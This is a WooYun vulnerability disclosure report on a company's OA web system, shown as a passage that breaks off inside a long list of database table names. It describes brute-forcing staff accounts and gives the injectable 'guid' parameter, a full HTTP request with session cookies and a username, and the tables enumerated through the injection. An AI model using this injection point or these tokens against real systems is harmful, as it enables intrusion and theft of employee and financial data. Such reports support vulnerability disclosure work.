乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-16: 细节已通知厂商并且等待厂商处理中 2015-10-19: 厂商已经确认,细节仅向厂商公开 2015-10-29: 细节向核心白帽子及相关领域专家公开 2015-11-08: 细节向普通白帽子公开 2015-11-18: 细节向实习白帽子公开 2015-12-03: 细节向公众公开
RT
1.中粮集团OA系统:http://oa.cofco-keystone.com/login.aspx?ReturnUrl=%2f
可爆破,大概爆出十多个账号
随便登陆个,是财务部主管账号
可以看全部的通讯录,员工手机邮箱泄露
大量内部文件
财务文件
2.SQL注入下载文件出存在注入
抓包可以看出文件名被重命名,存在数据库中,单引号报错
GET /webdoc/file_download.aspx?guid=9969d7d40ef64d43b10cf2306a24b90a* HTTP/1.1Host: oa.cofco-keystone.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://oa.cofco-keystone.com/frm/frm_flow_mainform.aspx?flow_ins_id=35076&flow_id=56&frm_id=72&id=0&hidbutton=true&Dialog=openCookie: ASP.NET_SessionId=pv1o1va1losavp453kg0fo55; LtpaToken=AAECAzU2MjAzRTAwNTYyMThGODB6aGFuZ2xlad1YTytfNlfv3WEZfa6hjwO7afmW; .ASPXAUTH=250164406A3B28308592637D653CED7B351F821F209BB2B9CA1CEFE01BB656133A12E508F84ECB9CE276F836A055D420B2225DAC268132D47E0CC4666512B1A99B3D7DD360CE927B9551CB611F251386FCA9CF5B09E029168B7BD49134B1C27EC483CDDC45D2B87F4F878C958DF8A72319ED879E; FIOA_EMP_ID=212; loginname=zhanglei; loginorg=1; FIOA_IMG_FOLDER=FI; lastLtpaTokenHeadKK=AAECAzU2MjAzRTAwNTYyMThGODB6aGFuZ2xlad1YTytfNlfv3WEZfa6hjwO7afmW; condition_is_in_cookie_0d650337a5854fcf=%20WHERE%201%3D1%20AND%20%28isactive%3D1%29%20AND%20%28org_id%3D1%29; condition_is_in_cookie_a1d79435d4d04641=%20WHERE%201%3D1%20AND%20%28isactive%3D1%29%20AND%20%28org_id%3D1%29; condition_is_in_cookie_cd9541d7cecd4cad=%20WHERE%201%3D1%20AND%20%28isactive%3D1%29%20AND%20%28org_id%3D1%29Connection: keep-alive
guid为注入参数DBA权限
涉及14个数据库
当前库将近1000个表
web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2008Database: EIS[978 tables]+------------------------------------+| C20080124180047 || C20080125123728 || C20080125124235 || C20080128150739 || C20080701101237 || C20080701102947 || C20080701105700 || C20080701145120 || C20080701145726 || C20081208140548 || C20081208142643 || C20081208150555 || C20081208171154 || C20081208175125 || C20081208213917 || C20081209091138 || C20081209094320 || C20081209103736 || C20081209103903 || C20081209110240 || C20081209112145 || C20081209113905 || C20081209115629 || C20081209124726 || C20081209164003 || C20081209175259 || C20081210094254 || C20081210101616 || C20081210112101 || C20101231131942 || C20101231153631 || C20110124134740 || C20110124141835 || C20110124152621 || C20110124163602 || C20110126092732 || C20110126142013 || C20110127144622 || C20110127152846 || C20110218165047 || C20110324113257 || C20110909135824 || C20110909145635 || C20110909152624 || C20110909181709 || C20110909181901 || C20110909185023 || C20110909185124 || C20110909190919 || C20110913110851 || C20110913144213 || C20110913152802 || C20110913155212 || C20110913164637 || C20110913170458 || C20110913174628 || C20110913180207 || C20110915110417 || C20110923231348 || C20110926214156 || C20110926230955 || C20111104140501 || C20111123002753 || C20120613113054 || C20120613161656 || C20120613161938 || C20120613164904 || C20120614120357 || C20120614153425 || C20120614162633 || C20120614170525 || C20120615124258 || C20120615153351 || C20120615164806 || C20120620145657 || C20120816141046 || C20120817092237 || C20120817110802 || C20120817142707 || C20120820173546 || C20120912120904 || C20120912154707 || C20120912155839 || C20120912164450 || C20120913101028 || C20120913101519 || C20120913105933 || C20120913215923 || C20121015111508 || C20121017103938 || C20121017144542 || C20121210195910 || C20121224173758 || C20130207142533 || C20130211200642 || C20130301153523 || C20130321101409 || C20130321162645 || C20130513155919 || C20130624114132 || C20130624141804 || C20130624150657 || C20130624150917 || C20130624152422 || C20130624153840 || C20130624155218 || C20130624160557 || C20130624161442 || C20130624163301 || C20130627155920 || C20130628095655 || C20130628160253 || C20130702160933 || C20130702171743 || C20130722161707 || C20130724135034 || C20130801110511 || C20131120100132 || C20131121195530 || C20131217111541 || C20131219112635 || C20131219162107 || C20131231141612 || C20140102165605 || C20140103162425 || C20140213144323 || C20140313112224 || C20140529151053 || C20140529152111 || C20140530145842 || C20140620143948 || C20140630152832 || C20140815101043 || C20140829165544 || C20140912150645 || C20141215111301 || C20141217161647 || C20141218160214 || C20150323091114 || C20150727164056 || EIS_FileUrl || FI_BAK_SQLBAK || FI_MESSAGE_RECORD || FI_MESSAGE_RECORD || FI_ORG_DEPT_EMP || FI_ORG_DEPT_EMP || FI_ORG_DEPT_FLEX || FI_ORG_DEPUTYLOG || FI_ORG_DW_IMGPRINT || FI_ORG_DW_IMGPRINT || FI_ORG_EMPINROLES || FI_ORG_EMP_CHECKLOCAL || FI_ORG_EMP_CHECKLOCAL || FI_ORG_EMP_FLEX || FI_ORG_EMP_IMGSIGN || FI_ORG_EMP_POSITION_temp || FI_ORG_GROUP || FI_ORG_INFO_FLEX || FI_ORG_INFO_FLEX || FI_ORG_POSITION_EMP || FI_ORG_POSITION_EMP || FI_ORG_ROLEOFRIGHT || FI_ORG_ROLES || FI_ORG_TITLE || FI_ORG_USEROFRIGHT || FI_PARTALS_LISTRIGHT || FI_PJ_INFO || FI_SYS_AGENT_LEFTMENU || FI_SYS_AGENT_LEFTMENU || FI_SYS_AGENT_TOPMENU || FI_SYS_ALERT_H || FI_SYS_ALERT_H || FI_SYS_AREA || FI_SYS_AWAKE || FI_SYS_CONDITION || FI_SYS_DATASOURCE || FI_SYS_DESC || FI_SYS_DESKTOPSOLUTION || FI_SYS_DESKTOP_CLASS || FI_SYS_DESKTOP_CLASS || FI_SYS_DESKTOP_DEFAULT || FI_SYS_DESKTOP_FLOW_DEFINE_DETAIL || FI_SYS_DESKTOP_FLOW_DEFINE_DETAIL || FI_SYS_DESKTOP_IMG || FI_SYS_DESKTOP_INFO || FI_SYS_DESKTOP_LINK || FI_SYS_DESKTOP_SELF || FI_SYS_DICT || FI_SYS_ERROR || FI_SYS_FAVORITE_DEFAULT || FI_SYS_FAVORITE_DEFAULT || FI_SYS_FUNCTION_DETAIL || FI_SYS_FUNCTION_DETAIL || FI_SYS_FUNCTION_RIGHT || FI_SYS_IKEY || FI_SYS_IMG || FI_SYS_IP || FI_SYS_KEY || FI_SYS_LOGON_DEFAULT || FI_SYS_LOGTYPE || FI_SYS_Login_ErrLog || FI_SYS_Login_ErrLog || FI_SYS_Login_ErrLog || FI_SYS_MENUSOLUTION || FI_SYS_MENU_BANNER || FI_SYS_MENU_BANNER || FI_SYS_MENU_BANNERSOLUTION || FI_SYS_MENU_LEFTLINK || FI_SYS_MENU_LEFTLINK || FI_SYS_MENU_LEFTSOLUTION || FI_SYS_MENU_RIGHT || FI_SYS_MENU_SELF || FI_SYS_MOBILE || FI_SYS_PORTAL_RIGHT || FI_SYS_PRINTSET || FI_SYS_PROCEDURE_PRM || FI_SYS_PROCEDURE_PRM || FI_SYS_PROFILE_LIST || FI_SYS_QUERY_CONDITION || FI_SYS_QUERY_ORDER || FI_SYS_QUERY_SOLUTION || FI_SYS_RIGHTASSIGN_INFO || FI_SYS_RIGHTASSIGN_ITEM || FI_SYS_SELSYSDATA_URL || FI_SYS_SERIALNO || FI_SYS_SIGN_DATA || FI_SYS_SIGN_HISTORY || FI_SYS_SIGN_MARK || FI_SYS_TABLE_DATARIGHT || FI_SYS_TABLE_DATARIGHT || FI_SYS_TRANSACTION || FI_SYS_VIEW || FI_customer_info || FTFY_TEL_COMMON || FTFY_TEL_MAN || KMS_CollectCategory || KMS_CollectPersonal || KMS_Images || KMS_KnowledgeDynamic || KMS_LibraryDocCount || KMS_LibraryDocCount || KMS_LibraryDownLoad || KMS_LibraryFolder || KMS_LibraryKMFolder || KMS_LibraryKMRelated || KMS_LibraryProFolder || KMS_LibraryProfessionalFolder || KMS_LibraryView || KMS_PortalMenus || KMS_Search_KeyWord || KMS_Search_KeywordRecord || KMS_Search_Knowledge || KMS_Search_Log || KMS_Search_ModuleList || KMS_Search_Record || KMS_Search_Synonym || KY_ARCHIVE_TREE_TMP || KY_ARCHIVE_TREE_TMP || Mekp_AttriMouldBase || Mekp_AttriMouldInfo || Mekp_AttriSelDefine || Mekp_AttriUseInfo || Mekp_AttributeOutData || Mekp_AttributeType || Mekp_BusinessAttribute || Mekp_CommentsReply || Mekp_KnowledgeMapImg || Mekp_KnowledgeMapRelation || Mekp_LibrarySelectColumn || Mekp_MouldDefaultSel || Mekp_PersonalCategory || Mekp_PersonalOperation || OA_CALENDAR_ASSIGN_DETAIL || OA_CALENDAR_ASSIGN_DETAIL || OA_CALENDAR_ASSIGN_DETAIL || OA_CALENDAR_ASSIGN_EMP || OA_CALENDAR_TASK || OA_CALENDAR_WORK || OA_CLIENT_ACCOUNT_INFO || OA_CLIENT_FLOW_DISPENSE || OA_CLIENT_FLOW_NOTICE || OA_CLIENT_FLOW_READER || OA_CLIENT_FLOW_SENDER || OA_CLIENT_FLOW_WAIT || OA_CONNECTOR_GROUP_DETAIL || OA_CONNECTOR_GROUP_DETAIL || OA_CONNECTOR_GROUP_DETAIL || OA_CRM_SUPPLIER || OA_CalendarSet_WorkTime || OA_CalendarSet_WorkTime || OA_DINNER_REGISTER || OA_DOC_CARD_RECORD || OA_DOC_CARD_RECORD || OA_DOC_CLASS || OA_DOC_DOCUMENT_INPUT_TEMP || OA_DOC_DOCUMENT_INPUT_TEMP || OA_DOC_FILE_DOWNLOAD || OA_DOC_FILE_DOWNLOAD || OA_DOC_FILE_INFO || OA_DOC_FLOW || OA_DOC_LAW_TREE || OA_DOC_LAW_TREE || OA_DOC_NEWS_REPLY || OA_DOC_NEWS_REPLY || OA_DOC_NEWS_TITLE || OA_DOC_POSITION || OA_DOC_READ || OA_DOC_RECORD || OA_DOC_REPLY || OA_DOC_RIGHT || OA_DOC_SECURITY || OA_DOC_TEMPLATE || OA_DOC_TREE || OA_DOSSIER_LOG || OA_EMAIL_MESSAGEIDS || OA_EMAIL_RECIVE || OA_EMAIL_SEND || OA_EMAIL_SET || OA_EXAM_DANXUAN_INFO || OA_EXAM_DANXUAN_INFO || OA_EXAM_DANXUAN_ITEM || OA_EXAM_DATABASE || OA_EXAM_DUOXUAN_INFO || OA_EXAM_DUOXUAN_ITEM || OA_EXAM_EMP_DANXUAN || OA_EXAM_EMP_DUOXUAN || OA_EXAM_EMP_INFO || OA_EXAM_EMP_ITEM || OA_EXAM_EMP_PANDUANG || OA_EXAM_EMP_PINGFEN || OA_EXAM_EMP_WENDA || OA_EXAM_KAOSHI_DANXUAN || OA_EXAM_KAOSHI_DUOXUAN || OA_EXAM_KAOSHI_INFO || OA_EXAM_KAOSHI_ITEM || OA_EXAM_KAOSHI_PANDUANG || OA_EXAM_KAOSHI_WENDA || OA_EXAM_PANDUANG || OA_EXAM_PASSTESTLOG || OA_EXAM_SCORE || OA_EXAM_SHIJUAN_INFO || OA_EXAM_SHIJUAN_ITEM || OA_EXAM_SUBJECT || OA_EXAM_TEST || OA_EXAM_WENDA || OA_FLOW_CENTER_MENU || OA_FLOW_DEFINE_CUSTACTION || OA_FLOW_DEFINE_CUSTACTION || OA_FLOW_DEFINE_DESK || OA_FLOW_DEFINE_FORM_RIGHT || OA_FLOW_DEFINE_FORM_RIGHT || OA_FLOW_DEFINE_NODE_ACTION || OA_FLOW_DEFINE_NODE_ACTION || OA_FLOW_DEFINE_NODE_LINE || OA_FLOW_DEFINE_NODE_POSITION || OA_FLOW_DEFINE_REF || OA_FLOW_DEFINE_SCHEMA || OA_FLOW_DEFINE_SENDERCLASS || OA_FLOW_DEFINE_SENDERCLASS || OA_FLOW_DEFINE_SENTENCE || OA_FLOW_DEFINE_USER_SENTENCE || OA_FLOW_DOC_READER || OA_FLOW_INST_DESK || OA_FLOW_INST_DESK || OA_FLOW_INST_DISPENSE || OA_FLOW_INST_FORM_H || OA_FLOW_INST_FORM_H || OA_FLOW_INST_H || OA_FLOW_INST_MAIL || OA_FLOW_INST_MOBILE || OA_FLOW_INST_MSG || OA_FLOW_INST_NODE_H || OA_FLOW_INST_NODE_H || OA_FLOW_INST_READER || OA_FLOW_INST_REPLY || OA_FLOW_INST_SENDER || OA_FLOW_MOBILE_VALIDATE || OA_FLOW_NOTICE_COMPLETED || OA_FLOW_NOTICE_COMPLETED || OA_FLOW_NOTICE_DESK || OA_FLOW_NOTICE_DISPENSE || OA_FLOW_NOTICE_READER_MAIN || OA_FLOW_NOTICE_READER_MAIN || OA_FLOW_NOTICE_SENDER || OA_FLOW_SUPERVISE_CHANGEFLOW || OA_FLOW_SUPERVISE_LOG || OA_FLOW_TIMEOUT_READER || OA_FLOW_WORDFORM || OA_FORM_AIPSIGN || OA_FORM_AWAKE || OA_FORM_BUTTON || OA_FORM_DOC || OA_FORM_FIELD_FLOW || OA_FORM_FIELD_FLOW || OA_FORM_FIELD_TAB || OA_FORM_INFO || OA_FORM_LIST_BUTTON || OA_FORM_LIST_BUTTON || OA_FORM_LIST_CONDITION || OA_FORM_LIST_FIELD || OA_FORM_LIST_ORDER || OA_FORM_MENU || OA_FORM_REFSUBFORM_DEFINE || OA_FORM_RIGHT || OA_FORM_SCRIPT || OA_FORM_SENTENCE || OA_FORM_SIGN || OA_FORM_TREEVIEW || OA_FORM_TREE_CLASS || OA_FORM_TREE_DATA || OA_FROM_TREE || OA_HOLEDAYCARD_HISTORY || OA_HOLEDAYCARD_HISTORY || OA_HR_CW_CALENDAR || OA_HR_CW_LEAVE_TYPE || OA_HR_CW_LEAVE_TYPE || OA_HR_CW_OUT_TYPE || OA_HR_CW_OUT_TYPE || OA_HR_CW_WORKLEAVE || OA_HR_CW_WORKSTATUS || OA_HR_CW_YEARCALENDAR || OA_HoledayCardContent || OA_LINK_EMAIL_AlERT || OA_LINK_EMAIL_SET || OA_MAIL_DEFINE || OA_MAIL_SMTP || OA_MEETING_ATTEND || OA_MEETING_ATTEND || OA_MEETING_AWAKE || OA_MEETING_REC || OA_MEETING_ROOM_REGISTER || OA_MEETING_ROOM_REGISTER || OA_MEETING_ROOM_SOURCE || OA_MEETING_TASK || OA_MEETNG_ROOM_OTHERSOURCE || OA_MESSAGE_ISREAD || OA_MESSAGE_ISREAD || OA_MESSAGE_REPLAY || OA_MOBILE_DEFINE || OA_MOBILE_MENU || OA_MOBILE_MSG || OA_MOBILE_PARAMETER || OA_MOBILE_TYPE || OA_NOTE_DESK || OA_NOTICE_INFO || OA_NOTICE_READ || OA_NOTICE_REPLY || OA_PROJECT_DEFINE || OA_PROJECT_FLOW || OA_PROJECT_INFO || OA_PROJECT_ITEM || OA_PROJECT_SEL || OA_PROJECT_TREE || OA_PROJECT_ZT_TREE || OA_QUESTIONAIRE_RESULT || OA_QUESTIONAIRE_RESULT || OA_REG_COMPANYDATA || OA_REPORT_ACTIVE_INFO || OA_REPORT_FLASH_FIELD || OA_REPORT_FLASH_INFO || OA_REPORT_HTML_FIELD || OA_REPORT_HTML_INFO || OA_REPORT_LIST_FIELD || OA_REPORT_LIST_INFO || OA_REPORT_LIST_SORT || OA_REPORT_PIC_FIELD || OA_REPORT_PIC_INFO || OA_REPORT_RUNTIME || OA_REPORT_SCRIPT || OA_RSS_TREE || OA_SERVER_ACCOUNT_INFO || OA_SERVER_ERROR || OA_SERVER_FLOW_DISPENSE || OA_SERVER_FLOW_NOTICE || OA_SERVER_FLOW_READER || OA_SERVER_FLOW_SENDER || OA_SERVER_FLOW_WAIT || OA_SERVER_NOTICE_DISPENSE || OA_SERVER_NOTICE_NOTICE || OA_SERVER_NOTICE_READER || OA_SERVER_NOTICE_SENDER || OA_SERVER_NOTICE_WAIT || OA_SUBFILL_CONDITION || OA_SUBFILL_FIELD || OA_SUBFILL_ORDER || OA_SUBFORM_FIELD || OA_SUBFORM_INFO || OA_SUBFORM_VIEW_FIELD || OA_SUBFORM_VIEW_INFO || OA_SYSFORM_INFO || OA_TASK_INLINE || OA_TASK_MONTH_DETAIL || OA_TASK_MONTH_MAIN || OA_TASK_WEEK_DETAIL || OA_TASK_WEEK_MAIN || OA_VOTE_FORMVIEW_INFO || OA_VOTE_FORMVIEW_ITEM || OA_VoteDetail || OA_VoteList || OA_Votes_Item || OA_Votes_Item || OA_WEBDOC_BOOKMARK || OA_WEBDOC_PATH || OA_WEBDOC_SIGNATURE || OA_WEBDOC_TEMPLATE_BOOKMARKS || OA_WEBDOC_TEMPLATE_BOOKMARKS || OA_WEBDOC_WEBSIGN_DATA || OA_WEBDOC_WEBSIGN_HISTORY || OA_WEBDOC_WEBSIGN_MARK || OA_WORK_TIME || OA_已处理流程 || OA_流程处理 || Passport_Account || Passport_SynchronizeSite || Passport_WebServiceUser || S20080124182553 || S20080126141044 || S20080701110343 || S20080701145950 || S20081208142516 || S20081208142956 || S20081208143319 || S20081208205000 || S20081209091249 || S20081209102001 || S20081209104027 || S20081209105710 || S20081209105756 || S20081209105812 || S20081209105830 || S20081209105908 || S20081209110425 || S20081209112432 || S20081209114233 || S20081209115726 || S20081210112947 || S20081210162322 || S20101231100451 || S20101231153850 || S20110124143152 || S20110124154523 || S20110127145002 || S20110909134445 || S20110909153430 || S20110913171245 || S20110913174958 || S20110914121354 || S20110921124952 || S20110926214618 || S20110926215323 || S20111122142139 || S20111122143204 || S20111123003002 || S20111124132643 || S20120614123602 || S20120615170006 || S20120618100316 || S20120618101443 || S20120620160840 || S20120817111649 || S20120817144757 || S20120821113528 || S20121010110610 || S20130301162645 || S20130624164416 || S20130624165051 || S20130624165536 || S20130624165641 || S20131120110146 || S20131220085431 || S20140103164907 || S20150107102359 || S20150326095820 || Students_admin || T_Information || TempImportTable || V_CALENDAR_OUTOFOFF_TYPE || V_FI_CONNECTOR_EMAIL_ADDRESS || V_FI_MESSAGE_INFO_LIST || V_FI_MESSAGE_LIST_STATUS_0 || V_FI_MESSAGE_LIST_STATUS_1 || V_FI_MESSAGE_LIST_STATUS_2 || V_FI_MESSAGE_LIST_STATUS_3 || V_FI_MESSAGE_LIST_STATUS_4 || V_FI_ORG_ACCOUNT || V_FI_ORG_DW || V_FI_ORG_EMPINROLES || V_FI_ORG_EMP_LEAVE || V_FI_ORG_EMP_LEAVE || V_FI_ORG_EMP_MENU || V_FI_ORG_EMP_POSITION || V_FI_ORG_EMP_SEL || V_FI_ORG_INFO || V_FI_ORG_POSITION_EMP || V_FI_ORG_POSITION_EMP || V_FI_ORG_POSITION_MENU || V_FI_ORG_POSITION_TREE || V_FI_ORG_ROLES_MENU || V_FI_ORG_ROLES_MENU || V_FI_REG_EMPINROLES || V_FI_SYS_AGENT || V_FI_SYS_DESKTOP_CLASS || V_FI_SYS_DESKTOP_CLASS || V_FI_SYS_EMPMENU_ROLE || V_FI_SYS_EMPMENU_TREE || V_FI_SYS_FUNCTION_DETAIL || V_FI_SYS_FUNCTION_DETAIL || V_FI_SYS_FUNCTION_EDIT || V_FI_SYS_FUNCTION_LIST || V_FI_SYS_FUNCTION_RIGHT || V_FI_SYS_GETDATE || V_FI_SYS_IMG || V_FI_SYS_LOGIN_MESSAGE || V_FI_SYS_MENUFUNCTION || V_FI_SYS_MENU_FUNCTION || V_FI_SYS_MENU_FUNCTION || V_FI_SYS_MENU_LEFTLINK || V_FI_SYS_MENU_RIGHT_TMP || V_FI_SYS_MENU_ROLEFUNCTION || V_FI_SYS_MENU_SELF || V_FI_SYS_MENU_TREE || V_FI_SYS_PORTAL_TREE || V_FI_SYS_PROCEDURE_PRM || V_FI_SYS_PROCEDURE_PRM || V_FI_SYS_RIGHTASSIGN_INFO || V_FI_SYS_SELEMP || V_FI_SYS_TABLE_DATARIGHT || V_FI_SYS_TRANSACTION || V_FI_SYS_VIEW || V_FI_SqlBak || V_KY_ARCHIVE_TREE || V_MEETING_ROOM_CALENDAR || V_MESSAGE_EMP_FLEX || V_MOBILE_EnabledModule || V_MOBILE_UnEnabledModule || V_OA_CALENDAR_ASSIGN_EMP || V_OA_CALENDAR_ASSIGN_EMP || V_OA_CALENDAR_ASSIGN_EMP || V_OA_CALENDAR_ASSIGN_TMP || V_OA_CALENDAR_INLINE || V_OA_CALENDAR_OUTOFOFF_DATA || V_OA_CALENDAR_OUTOFOFF_TYPE || V_OA_CALENDAR_TASK || V_OA_CALENDAR_TITLE || V_OA_CLIENT_ACCOUNT_INFO || V_OA_CLIENT_FLOW_DISPENSE || V_OA_CONNECTOR_GROUP_DEP || V_OA_CONNECTOR_GROUP_DEP || V_OA_CONNECTOR_GROUP_DEP || V_OA_CONNECTOR_GROUP_EMP || V_OA_CONNECTOR_GROUP_IN || V_OA_CONNECTOR_GROUP_MAN || V_OA_CONNECTOR_GROUP_OUT || V_OA_CONNECTOR_GROUP_PGI || V_OA_CONNECTOR_GROUP_PGO || V_OA_CONNECTOR_GROUP_POS || V_OA_CONNECTOR_GROUP_SGI || V_OA_CONNECTOR_GROUP_SGO || V_OA_DINNER_REGISTER || V_OA_DOC_CARD || V_OA_DOC_CLASS || V_OA_DOC_DOCUMENT_Q || V_OA_DOC_DOCUMENT_Q || V_OA_DOC_FILE || V_OA_DOC_FLOW || V_OA_DOC_LAW_TREE || V_OA_DOC_LAW_TREE || V_OA_DOC_NEWS_REPLY || V_OA_DOC_NEWS_REPLY || V_OA_DOC_POSITION || V_OA_DOC_READ || V_OA_DOC_RECORD || V_OA_DOC_REPLY || V_OA_DOC_RIGHT_DEPT || V_OA_DOC_RIGHT_POSITION || V_OA_DOC_TEMPLATE || V_OA_DOC_TREE || V_OA_DOSSIER_LOG || V_OA_EXAM_DATABASE || V_OA_EXAM_EMP_DANXUAN || V_OA_EXAM_EMP_DUOXUAN || V_OA_EXAM_EMP_INFO || V_OA_EXAM_EMP_ITEM || V_OA_EXAM_EMP_PANDUANG || V_OA_EXAM_EMP_PINGFEN || V_OA_EXAM_EMP_WENDA || V_OA_EXAM_KAOSHI_INFO || V_OA_EXAM_NEEDTEST || V_OA_EXAM_PINGFEN_TREE || V_OA_EXAM_SCORE || V_OA_EXAM_SHIJUAN_DANXUAN || V_OA_EXAM_SHIJUAN_DUOXUAN || V_OA_EXAM_SHIJUAN_INFO || V_OA_EXAM_SHIJUAN_PANDUANG || V_OA_EXAM_SHIJUAN_WENDA || V_OA_EXAM_TEST || V_OA_FLOW_ARCHIVE || V_OA_FLOW_CENTER_MENU || V_OA_FLOW_DEFINE_FORM_ALL || V_OA_FLOW_DEFINE_FORM_ALL || V_OA_FLOW_DEFINE_FORM_ALL || V_OA_FLOW_DEFINE_NODE || V_OA_FLOW_DEFINE_REF_NEW || V_OA_FLOW_DEFINE_REF_NEW || V_OA_FLOW_DEFINE_RELFORM || V_OA_FLOW_DESKTOP_AWAKE || V_OA_FLOW_DOCUMENT || V_OA_FLOW_INST_DELAYBYINSTNODE || V_OA_FLOW_INST_DELAYBYINSTNODE || V_OA_FLOW_INST_DELAYBYINSTNODE || V_OA_FLOW_INST_DELAYPASSBYINSTNODE || V_OA_FLOW_INST_DESK || V_OA_FLOW_INST_DISPENSE || V_OA_FLOW_INST_H || V_OA_FLOW_INST_LIST_A || V_OA_FLOW_INST_LIST_A || V_OA_FLOW_INST_LIST_H || V_OA_FLOW_INST_MSG || V_OA_FLOW_INST_NODE_A || V_OA_FLOW_INST_NODE_A || V_OA_FLOW_INST_NODE_BACKSIGN || V_OA_FLOW_INST_NODE_H_TRACK || V_OA_FLOW_INST_NODE_JUMPBACK || V_OA_FLOW_INST_NODE_TRACK || V_OA_FLOW_INST_REPLY || V_OA_FLOW_INST_SENDER || V_OA_FLOW_MOBILE_VALIDATE || V_OA_FLOW_MYFLOWC_TEMP || V_OA_FLOW_MYFLOW_TEMP || V_OA_FLOW_NODE_RIGHT || V_OA_FLOW_NOTICE_DESK || V_OA_FLOW_NOTICE_DISPENSE || V_OA_FLOW_NOTICE_READER_MAIN || V_OA_FLOW_NOTICE_SENDER || V_OA_FLOW_PROGRESS || V_OA_FLOW_SENDER || V_OA_FLOW_WORDFORM || V_OA_FORM_AIPSIGN || V_OA_FORM_DOC || V_OA_FORM_EDITTABLE_INFO || V_OA_FORM_FIELD_FLOW || V_OA_FORM_FIELD_FLOW || V_OA_FORM_FIELD_LIST_DEFINE || V_OA_FORM_FIELD_LIST_DEFINE || V_OA_FORM_INFO || V_OA_FORM_LIST_FIELD || V_OA_FORM_LIST_FIELD || V_OA_FORM_SENTENCE || V_OA_FORM_SIGN || V_OA_FORM_TREE_CLASS || V_OA_FORM_TREE_DATA || V_OA_FROM_TREE || V_OA_HOLEDAYCARD_HISTORY || V_OA_HOLEDAYCARD_HISTORY || V_OA_HR_CW_LEAVE || V_OA_HR_CW_OUT || V_OA_HoledayCardContent || V_OA_MEETING_REC || V_OA_MEETING_REC || V_OA_MEETING_ROOM_REGISTER || V_OA_MEETING_ROOM_REGISTER || V_OA_MEETING_TASK || V_OA_MESSAGE || V_OA_MONTH_TASK_SUM || V_OA_NOTICE_DATA || V_OA_NOTICE_FLOW_READER || V_OA_NOTICE_FLOW_READER || V_OA_NOTICE_FLOW_TIMEOUT || V_OA_NOTICE_INFO_H || V_OA_NOTICE_INFO_H || V_OA_NOTICE_NOTICE || V_OA_NOTICE_READ || V_OA_NOTICE_REPLY || V_OA_PROJECT_DEFINE_SELECT || V_OA_PROJECT_DEFINE_SELECT || V_OA_PROJECT_FLOW || V_OA_PROJECT_INFO || V_OA_PROJECT_TASK || V_OA_PROJECT_TREE || V_OA_PROJECT_ZT_TREE || V_OA_QUESTIONAIRE_RESULT_SUM || V_OA_QUESTIONAIRE_RESULT_SUM || V_OA_QUESTIONAIRE_RESULT_SUM || V_OA_QUESTIONAIRE_TITLE || V_OA_REG_COMPANYDATA || V_OA_REPORT_ACTIVE_INFO || V_OA_REPORT_FLASH_FIELD || V_OA_REPORT_FLASH_INFO || V_OA_REPORT_HTML_INFO || V_OA_REPORT_LIST_FIELD || V_OA_REPORT_LIST_INFO || V_OA_REPORT_PIC_FIELD || V_OA_REPORT_PIC_INFO || V_OA_RSS_TREE || V_OA_SERVER_FLOW_NOTICE || V_OA_SERVER_FLOW_READER || V_OA_SERVER_FLOW_SENDER || V_OA_SUBFORM_FIELD_LIST || V_OA_SUBFORM_FIELD_LIST || V_OA_SUBFORM_INFO || V_OA_SUBFORM_VIEW_FIELD || V_OA_SUBFORM_VIEW_INFO || V_OA_TABLE_MANAGER_INTO || V_OA_TABLE_OPERATE_INTO || V_OA_TASK_DAY || V_OA_TASK_MONTH_DETAIL || V_OA_TASK_MONTH_MAIN || V_OA_TASK_WEEK_DETAIL || V_OA_TASK_WEEK_MAIN || V_OA_VOTE_FORMVIEW_INFO || V_OA_VoteList || V_OA_Votes || V_fi_loginctrl_define || V_mekp_Authorize_status_0 || V_mekp_Authorize_status_1 || V_mekp_ModuleList || V_mekp_PrivilegeList || dtproperties || fi_loginctrl_define || fi_loginctrl_ipctrl || fi_media_info || fi_message_info || fi_message_reply || fi_message_type || fi_sys_bigtask || fi_sys_help || fi_sys_lic || fi_sys_parameter || fi_sys_timerclass || fi_test || fi_upload_file || fioa_sms_info || forums_BlockedIpAddresses || forums_UserProfile || forums_Users || ld_pj_info || mekp_Authorize_maps || mekp_Authorize_maps || mekp_Comments || mekp_CommonLinkDetail || mekp_CommonLinkDetail || mekp_DocAttributeValue || mekp_DocAttributes || mekp_DocContents || mekp_DocDraft || mekp_DocVersion || mekp_EISProductInfo || mekp_EmpGuideFolder || mekp_EmpGuideFolder || mekp_ExpertFolder || mekp_ExpertInfo || mekp_Fields || mekp_Information_remind || mekp_Information_remind || mekp_IntegralBase || mekp_IntegralHonorLevel || mekp_IntegralHonorLevel || mekp_IntegralHonorNum || mekp_IntegralInfo || mekp_IntegralRule || mekp_IntegralUser || mekp_KeywordSearchHistory || mekp_LFields || mekp_LibraryColumn || mekp_LibraryColumn || mekp_LibraryDocCount || mekp_LibraryDocViewCount || mekp_LibraryDocYear || mekp_LibraryFolder || mekp_LibraryItems || mekp_LibraryKMFolder || mekp_LibraryKMRelated || mekp_LibraryMechanism || mekp_LibraryProFolder || mekp_LibraryProfessionalFolder || mekp_MessageCenterPerson || mekp_MessageCenterPerson || mekp_MessageCenterSendLog || mekp_MessageCenterSendLog || mekp_MessageCenterUser || mekp_MobileConfig || mekp_MobileDingTalkMenu || mekp_MobileIndexTag || mekp_MobileInitTag || mekp_MobileModule || mekp_MobileModuleTag || mekp_MobileWeChartBinding || mekp_MobileWeChartMenu || mekp_NavTreeDetail || mekp_NavTreeDetail || mekp_NewsPic || mekp_OrgActionPrivilege || mekp_PortalCommonLink || mekp_PortalCommonLink || mekp_PortalDefaultAccess || mekp_PortalGlobel || mekp_PortalNav || mekp_PortalShortCut || mekp_Privilege || mekp_ProjectAssessment || mekp_ProjectAssessment || mekp_ProjectAttentionUser || mekp_ProjectDateRule || mekp_ProjectDateRuleView || mekp_ProjectDoc || mekp_ProjectDocSet || mekp_ProjectFolder || mekp_ProjectGroupRole || mekp_ProjectProcess || mekp_ProjectResources || mekp_ProjectRoleGroup || mekp_ProjectRoleGroup || mekp_ProjectRoleUser || mekp_ProjectSummary || mekp_ProjectTask || mekp_ProjectTaskView || mekp_ProjectWarning || 